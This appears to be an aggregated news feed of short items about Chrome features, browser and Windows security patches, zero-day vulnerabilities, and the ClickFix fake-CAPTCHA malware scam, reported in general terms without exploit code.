Google is introducing a new Chrome browser feature for Android and desktop users that automatically turns off notifications for websites that you're already ignoring. From a report: Chrome's Safety Check feature already provides similar functionality for camera access and location tracking permissions. This new auto-revocation feature builds on a similar Android feature that already makes it easier for Chrome users to unsubscribe from website notifications they don't care about with a single tap. The feature doesn't revoke notifications for any web apps installed on the device, and permissions will only be disabled for sites that send a lot of notifications that users rarely engage with. Less than one percent of all web notifications in Chrome currently receive any interaction from users, according to Google, often making them more distracting than helpful.

Read more of this story at Slashdot.

High-severity flaws were patched in Chrome’s WebGPU and Video components, and in Firefox’s Graphics and JavaScript Engine components.

The post Chrome 141 and Firefox 143 Patches Fix High-Severity Vulnerabilities appeared first on SecurityWeek.

An anonymous reader shared this article from the Washington Post: A student taking an online quiz sees a button appear in their Chrome browser: "homework help." Soon, Google's artificial intelligence has read the question on-screen and suggests "choice B" as the answer. The temptation to cheat was suddenly just two clicks away Sept. 2, when Google quietly added a "homework help" button to Chrome, the world's most popular web browser. The button has been appearing automatically on the kinds of course websites used by the majority of American college students and many high-schoolers, too. Pressing it launches Google Lens, a service that reads what's on the page and can provide an "AI Overview" answer to questions — including during tests. Educators I've spoken with are alarmed. Schools including Emory University, the University of Alabama, the University of California at Los Angeles and the University of California at Berkeley have alerted faculty how the button appears in the URL box of course sites and their limited ability to control it. Chrome's cheating tool exemplifies Big Tech's continuing gold rush approach to AI: launch first, consider consequences later and let society clean up the mess. "Google is undermining academic integrity by shoving AI in students' faces during exams," says Ian Linkletter, a librarian at the British Columbia Institute of Technology who first flagged the issue to me. "Google is trying to make instructors give up on regulating AI in their classroom, and it might work. Google Chrome has the market share to change student behavior, and it appears this is the goal." Several days after I contacted Google about the issue, the company told me it had temporarily paused the homework help button — but also didn't commit to keeping it off. "Students have told us they value tools that help them learn and understand things visually, so we're running tests offering an easier way to access Lens while browsing," Google spokesman Craig Ewer said in a statement.

Read more of this story at Slashdot.

Google has added Gemini features to Chrome for all desktop users in the US browsing in English following a limited release to paying subscribers in May. The update introduces a Gemini button in the browser that launches a chatbot capable of answering questions about page content and synthesizing information from multiple tabs. Users can remove the Gemini sparkle icon from Chrome's interface. Google will add its AI Mode search feature to Chrome's address bar before September ends. The feature will suggest prompts based on webpage content but won't replace standard search functionality. Chrome on Android already includes Gemini features. The company plans to add agentic capabilities in coming months that would allow Gemini to perform tasks like adding items to online shopping carts by controlling the browser cursor.

Read more of this story at Slashdot.

An exploited type confusion in the V8 JavaScript engine tracked as CVE-2025-10585 was found by Google Threat Analysis Group this week.

The post Chrome 140 Update Patches Sixth Zero-Day of 2025 appeared first on SecurityWeek.

Google patched a critical use-after-free vulnerability in Chrome that could potentially lead to code execution.

The post Critical Chrome Vulnerability Earns Researcher $43,000 appeared first on SecurityWeek.

Chrome has extended its dominance in the browser wars, surpassing 70% market share on desktops while Edge, Safari, Firefox, and Opera trail far behind. Neowin reports: According to [Statcounter], in August 2025, Chrome kept on increasing its overwhelming market share, which is now above the 70% mark (70.25%, to be precise) in the desktop browser market. The gap between Chrome and its closest competitor, Microsoft Edge, is immense, with Edge holding just 11.8% (+0.01 points over the previous month). Apple's Safari is third with 6.34% (+1.04 points); Firefox has 4.94% (-0.36 points); and Opera is fifth with a modest 2.06% market share (-0.13 points). Things look similar on the mobile side of the market, with Google Chrome having 69.15% (+1.92 points) and Safari being second with 20.32% (-2.2 points). Samsung Internet is third with 3.33% (-0.17 points). As for Microsoft Edge, its mobile share is only 0.59% (+0.06 points). The findings can be found here.

Read more of this story at Slashdot.

Microsoft today released security updates to fix at least 67 vulnerabilities in its Windows operating systems and software. Redmond warns that one of the flaws is already under active attack, and that software blueprints showing how to exploit a pervasive Windows bug patched this month are now public.

The sole zero-day flaw this month is CVE-2025-33053, a remote code execution flaw in the Windows implementation of WebDAV — an HTTP extension that lets users remotely manage files and directories on a server. While WebDAV isn’t enabled by default in Windows, its presence in legacy or specialized systems still makes it a relevant target, said Seth Hoyt, senior security engineer at Automox.

Adam Barnett, lead software engineer at Rapid7, said Microsoft’s advisory for CVE-2025-33053 does not mention that the Windows implementation of WebDAV is listed as deprecated since November 2023, which in practical terms means that the WebClient service no longer starts by default.

“The advisory also has attack complexity as low, which means that exploitation does not require preparation of the target environment in any way that is beyond the attacker’s control,” Barnett said. “Exploitation relies on the user clicking a malicious link. It’s not clear how an asset would be immediately vulnerable if the service isn’t running, but all versions of Windows receive a patch, including those released since the deprecation of WebClient, like Server 2025 and Windows 11 24H2.”

Microsoft warns that an “elevation of privilege” vulnerability in the Windows Server Message Block (SMB) client (CVE-2025-33073) is likely to be exploited, given that proof-of-concept code for this bug is now public. CVE-2025-33073 has a CVSS risk score of 8.8 (out of 10), and exploitation of the flaw leads to the attacker gaining “SYSTEM” level control over a vulnerable PC.

“What makes this especially dangerous is that no further user interaction is required after the initial connection—something attackers can often trigger without the user realizing it,” said Alex Vovk, co-founder and CEO of Action1. “Given the high privilege level and ease of exploitation, this flaw poses a significant risk to Windows environments. The scope of affected systems is extensive, as SMB is a core Windows protocol used for file and printer sharing and inter-process communication.”

Beyond these highlights, 10 of the vulnerabilities fixed this month were rated “critical” by Microsoft, including eight remote code execution flaws.

Notably absent from this month’s patch batch is a fix for a newly discovered weakness in Windows Server 2025 that allows attackers to act with the privileges of any user in Active Directory. The bug, dubbed “BadSuccessor,” was publicly disclosed by researchers at Akamai on May 21, and several public proof-of-concepts are now available. Tenable’s Satnam Narang said organizations that have at least one Windows Server 2025 domain controller should review permissions for principals and limit those permissions as much as possible.

Adobe has released updates for Acrobat Reader and six other products addressing at least 259 vulnerabilities, most of them in an update for Experience Manager. Mozilla Firefox and Google Chrome both recently released security updates that require a restart of the browser to take effect. The latest Chrome update fixes two zero-day exploits in the browser (CVE-2025-5419 and CVE-2025-4664).

For a detailed breakdown on the individual security updates released by Microsoft today, check out the Patch Tuesday roundup from the SANS Internet Storm Center. Action 1 has a breakdown of patches from Microsoft and a raft of other software vendors releasing fixes this month. As always, please back up your system and/or data before patching, and feel free to drop a note in the comments if you run into any problems applying these updates.

A clever malware deployment scheme first spotted in targeted attacks last year has now gone mainstream. In this scam, dubbed “ClickFix,” the visitor to a hacked or malicious website is asked to distinguish themselves from bots by pressing a combination of keyboard keys that causes Microsoft Windows to download password-stealing malware.

ClickFix attacks mimic the “Verify You are a Human” tests that many websites use to separate real visitors from content-scraping bots. This particular scam usually starts with a website popup that looks something like this:

Clicking the “I’m not a robot” button generates a pop-up message asking the user to take three sequential steps to prove their humanity.

Step 1 involves simultaneously pressing the keyboard key with the Windows icon and the letter “R,” which opens a Windows “Run” prompt that will execute any specified program that is already installed on the system.

Step 2 asks the user to press the “CTRL” key and the letter “V” at the same time, which pastes malicious code from the site’s virtual clipboard.

Step 3 — pressing the “Enter” key — causes Windows to download and launch malicious code through “mshta.exe,” a Windows program designed to run Microsoft HTML application files.

“This campaign delivers multiple families of commodity malware, including XWorm, Lumma stealer, VenomRAT, AsyncRAT, Danabot, and NetSupport RAT,” Microsoft wrote in a blog post on Thursday. “Depending on the specific payload, the specific code launched through mshta.exe varies. Some samples have downloaded PowerShell, JavaScript, and portable executable (PE) content.”

According to Microsoft, hospitality workers are being tricked into downloading credential-stealing malware by cybercriminals impersonating Booking.com. The company said attackers have been sending malicious emails impersonating Booking.com, often referencing negative guest reviews, requests from prospective guests, or online promotion opportunities — all in a bid to convince people to step through one of these ClickFix attacks.

In November 2024, KrebsOnSecurity reported that hundreds of hotels that use booking.com had been subject to targeted phishing attacks. Some of those lures worked, and allowed thieves to gain control over booking.com accounts. From there, they sent out phishing messages asking for financial information from people who’d just booked travel through the company’s app.

Earlier this month, the security firm Arctic Wolf warned about ClickFix attacks targeting people working in the healthcare sector. The company said those attacks leveraged malicious code stitched into the widely used physical therapy video site HEP2go that redirected visitors to a ClickFix prompt.

An alert (PDF) released in October 2024 by the U.S. Department of Health and Human Services warned that the ClickFix attack can take many forms, including fake Google Chrome error pages and popups that spoof Facebook.

The ClickFix attack — and its reliance on mshta.exe — is reminiscent of phishing techniques employed for years that hid exploits inside Microsoft Office macros. Malicious macros became such a common malware threat that Microsoft was forced to start blocking macros by default in Office documents that try to download content from the web.

Alas, the email security vendor Proofpoint has documented plenty of ClickFix attacks via phishing emails that include HTML attachments spoofing Microsoft Office files. When opened, the attachment displays an image of Microsoft Word document with a pop-up error message directing users to click the “Solution” or “How to Fix” button.

Organizations that wish to do so can take advantage of Microsoft Group Policy restrictions to prevent Windows from executing the “run” command when users hit the Windows key and the “R” key simultaneously.

An insufficient validation input flaw, one of 11 patched in an update this week, could allow for arbitrary code execution and is under active attack.

Brian King // News from Google this week says that Chrome will start enforcing Certificate Transparency a year from now. https://groups.google.com/a/chromium.org/forum/#!topic/ct-policy/78N3SMcqUGw This means that when Chrome contacts a website, if […]

The post Certificate Transparency Means What, Again? appeared first on Black Hills Information Security, Inc..